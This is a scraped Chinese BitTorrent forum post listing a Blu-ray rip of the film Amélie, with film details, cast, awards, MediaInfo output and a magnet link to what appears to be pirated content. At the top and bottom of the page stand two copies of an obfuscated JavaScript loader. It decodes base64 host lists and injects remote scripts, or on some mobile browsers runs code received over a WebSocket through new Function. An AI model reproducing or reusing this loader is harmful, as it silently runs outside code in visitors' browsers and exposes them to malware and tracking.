天使爱美丽[中文字幕].Amelie.2001.1080p.BluRay.x265.10bit.DTS 8.78GB

版主小s 27天前 199

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译  名 天使爱美丽 / 艾蜜莉的异想世界(台) / 天使艾米莉 / 天使艾美丽 / 阿梅丽的奇妙命运 / 艾蜜丽 / Amelie
◎片  名 Le fabuleux destin d'Amélie Poulain
◎年  代 2001
◎产  地 法国 / 德国
◎类  别 剧情 / 喜剧 / 爱情
◎语  言 法语 / 俄语
◎上映日期 2001-04-25(法国) / 2001-08-16(德国)
◎IMDb链接 https://www.imdb.com/title/tt0211915/
◎豆瓣评分 8.7/10 (870758人评价)
◎豆瓣链接 https://movie.douban.com/subject/1292215/
◎片  长 122分钟
◎导  演 让-皮埃尔·热内 Jean-Pierre Jeunet (id:1054518)
◎编  剧 纪尧姆·洛朗 Guillaume Laurant (id:1289511)
       让-皮埃尔·热内 Jean-Pierre Jeunet (id:1054518)
◎演  员 奥黛丽·塔图 Audrey Tautou (id:1004860)
       马修·卡索维茨 Mathieu Kassovitz (id:1022733)
       吕菲斯 Rufus (id:1142111)
       洛莱拉·克拉沃塔 Lorella Cravotta (id:1077480)
       塞尔·梅林 Serge Merlin (id:1330182)
       贾梅尔·杜布兹 Jamel Debbouze (id:1018139)
       克洛蒂尔德·莫莱特 Clotilde Mollet (id:1330183)
       克莱尔·莫里耶 Claire Maurier (id:1116502)
       伊莎贝尔·南蒂 Isabelle Nanty (id:1007192)
       多米尼克·皮侬 Dominique Pinon (id:1128740)
       阿尔蒂斯·德·彭居埃恩 Artus de Penguern (id:1032852)
       友兰达·梦露 Yolande Moreau (id:1032335)
       于尔班·康塞利埃 Urbain Cancelier (id:1330184)
       莫里斯·贝尼舒 Maurice Bénichou (id:1279799)
       米歇尔·罗班 Michel Robin (id:1028511)
       安德烈·达芒 Andrée Damant (id:1370586)
       克洛德·佩隆 Claude Perron (id:1005208)
       阿尔梅尔 Armelle (id:1056899)
       迪基·奥尔加多 Ticky Holgado (id:1091040)
       Kevin Fernandes Kevin Fernandes (id:1375735)
       弗洛拉·吉耶 Flora Guiet (id:1375736)
       阿莫里·巴博尔 Amaury Babault (id:1375737)
       欧仁·贝蒂埃 Eugène Berthier (id:1375740)
       让·达里 Jean Darie (id:1375738)
       马克·阿米约 Marc Amyot (id:1375739)
       安德烈·杜索里埃 André Dussollier (id:1009174)
       林原惠美 Megumi Hayashibara (id:1002915)
       姜广涛 Guangtao Jiang (id:1317670)
       Jean-Marc Deschamps Jean-Marc Deschamps (id:1282286)
       杨·提尔森 Yann Tiersen (id:1009767)
       布鲁诺·德尔邦内尔 Bruno Delbonnel (id:1282195)
       Volker Sch?fer Volker Sch?fer (id:1297033)
       玛丽-劳尔·瓦拉 Marie-Laure Valla (id:1299803)
       艾琳·博内托 Aline Bonetto (id:1278939)
       马德琳·封丹 Madeline Fontaine (id:1283945)
       Thomas Duval Thomas Duval (id:1276481)

◎标  签 法国 / 爱情 / 奥黛丽·塔图 / 法国电影 / 文艺 / 经典 / 喜剧 / 浪漫

◎简  介
  艾米莉(奥黛丽·塔图 Audrey Tautou 饰)有着别人看来不幸的童年——父亲给她做健康检查时,发现她心跳过快,便断定她患上心脏病,从此艾米莉与学校绝缘。随后因为一桩意外,母亲在她眼前突然死去。这一切都毫不影响艾米莉对生活的豁达乐观。                                    
                                1997年,戴安娜王妃的去世让她倍感人生的孤独脆弱,艾米莉从此开始了一系列助人计划,包括自闭忧郁的邻居老人,被老板刻薄的菜摊伙计、遗失了童年器物的旧房东、爱情失意的咖啡店同事。但她万万想不到,成人录象带商店店员尼诺(马修·卡索维 Mathieu Kassovitz 饰),竟成为她的棘手对象,艾米莉开始了令人哭笑不得的另类计划……

◎获奖情况 (共6项)
  第74届奥斯卡金像奖 (2002)
  最佳原创剧本(提名)
  最佳外语片(提名)
   └──让-皮埃尔·热内 (id:1054518)
  最佳摄影(提名)
   └──布鲁诺·德尔邦内尔 (id:1282195)
  最佳音响(提名)
  最佳艺术指导(提名)

  第59届金球奖 (2002)
  电影类 最佳外语片(提名)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 104913658414296087160409067485623819202 (0x4EEDA2B8BF7C8B22ECCFB1C118A51BC2)
  4. Complete name                            : Amelie.2[email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 8.78 GiB
  8. Duration                                 : 2 h 2 min
  9. Overall bit rate                         : 10.3 Mb/s
  10. Movie name                               : Amélie - Blu-ray?
  11. Encoded date                             : UTC 2021-11-04 05:10:22
  12. Writing application                      : mkvmerge v62.0.0 ('Apollo') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@Main
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 2 h 2 min
  23. Bit rate                                 : 8 753 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 816 pixels
  26. Display aspect ratio                     : 2.35:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.233
  33. Stream size                              : 7.46 GiB (85%)
  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  35. Encoding settings                        : rc=crf / crf=17.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Audio
  39. ID                                       : 2
  40. ID in the original source medium         : 4352 (0x1100)
  41. Format                                   : DTS
  42. Format/Info                              : Digital Theater Systems
  43. Codec ID                                 : A_DTS
  44. Duration                                 : 2 h 2 min
  45. Bit rate mode                            : Constant
  46. Bit rate                                 : 1 509 kb/s
  47. Channel(s)                               : 6 channels
  48. Channel layout                           : C L R Ls Rs LFE
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 93.750 FPS (512 SPF)
  51. Bit depth                                : 24 bits
  52. Compression mode                         : Lossy
  53. Stream size                              : 1.29 GiB (15%)
  54. Language                                 : French
  55. Default                                  : Yes
  56. Forced                                   : No
  57. Original source medium                   : Blu-ray
  58. Text #1
  59. ID                                       : 3
  60. ID in the original source medium         : 4611 (0x1203)
  61. Format                                   : PGS
  62. Muxing mode                              : zlib
  63. Codec ID                                 : S_HDMV/PGS
  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  65. Duration                                 : 1 h 56 min
  66. Bit rate                                 : 20.2 kb/s
  67. Count of elements                        : 2418
  68. Stream size                              : 16.8 MiB (0%)
  69. Title                                    : chs
  70. Language                                 : Chinese
  71. Default                                  : Yes
  72. Forced                                   : No
  73. Original source medium                   : Blu-ray
  74. Text #2
  75. ID                                       : 4
  76. ID in the original source medium         : 4612 (0x1204)
  77. Format                                   : PGS
  78. Muxing mode                              : zlib
  79. Codec ID                                 : S_HDMV/PGS
  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  81. Duration                                 : 1 h 56 min
  82. Bit rate                                 : 20.5 kb/s
  83. Count of elements                        : 2418
  84. Stream size                              : 17.0 MiB (0%)
  85. Title                                    : cht
  86. Language                                 : Chinese
  87. Default                                  : No
  88. Forced                                   : No
  89. Original source medium                   : Blu-ray
  90. Text #3
  91. ID                                       : 5
  92. ID in the original source medium         : 4608 (0x1200)
  93. Format                                   : PGS
  94. Muxing mode                              : zlib
  95. Codec ID                                 : S_HDMV/PGS
  96. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  97. Duration                                 : 1 h 56 min
  98. Bit rate                                 : 35.0 kb/s
  99. Count of elements                        : 2138
  100. Stream size                              : 29.1 MiB (0%)
  101. Title                                    : eng
  102. Language                                 : English
  103. Default                                  : No
  104. Forced                                   : No
  105. Original source medium                   : Blu-ray
  106. Menu
  107. 00:00:00.000                             : en:Chapter 01
  108. 00:09:12.885                             : en:Chapter 02
  109. 00:14:22.653                             : en:Chapter 03
  110. 00:21:38.547                             : en:Chapter 04
  111. 00:30:48.513                             : en:Chapter 05
  112. 00:39:06.969                             : en:Chapter 06
  113. 00:47:42.901                             : en:Chapter 07
  114. 00:57:27.944                             : en:Chapter 08
  115. 01:05:12.116                             : en:Chapter 09
  116. 01:11:30.369                             : en:Chapter 10
  117. 01:17:28.393                             : en:Chapter 11
  118. 01:25:36.798                             : en:Chapter 12
  119. 01:32:42.974                             : en:Chapter 13
  120. 01:39:07.650                             : en:Chapter 14
  121. 01:45:19.354                             : en:Chapter 15
  122. 01:51:47.701                             : en:Chapter 16


TAGS 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:1FC365A2C5E3C261B890F084A299F225DDC2D318

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};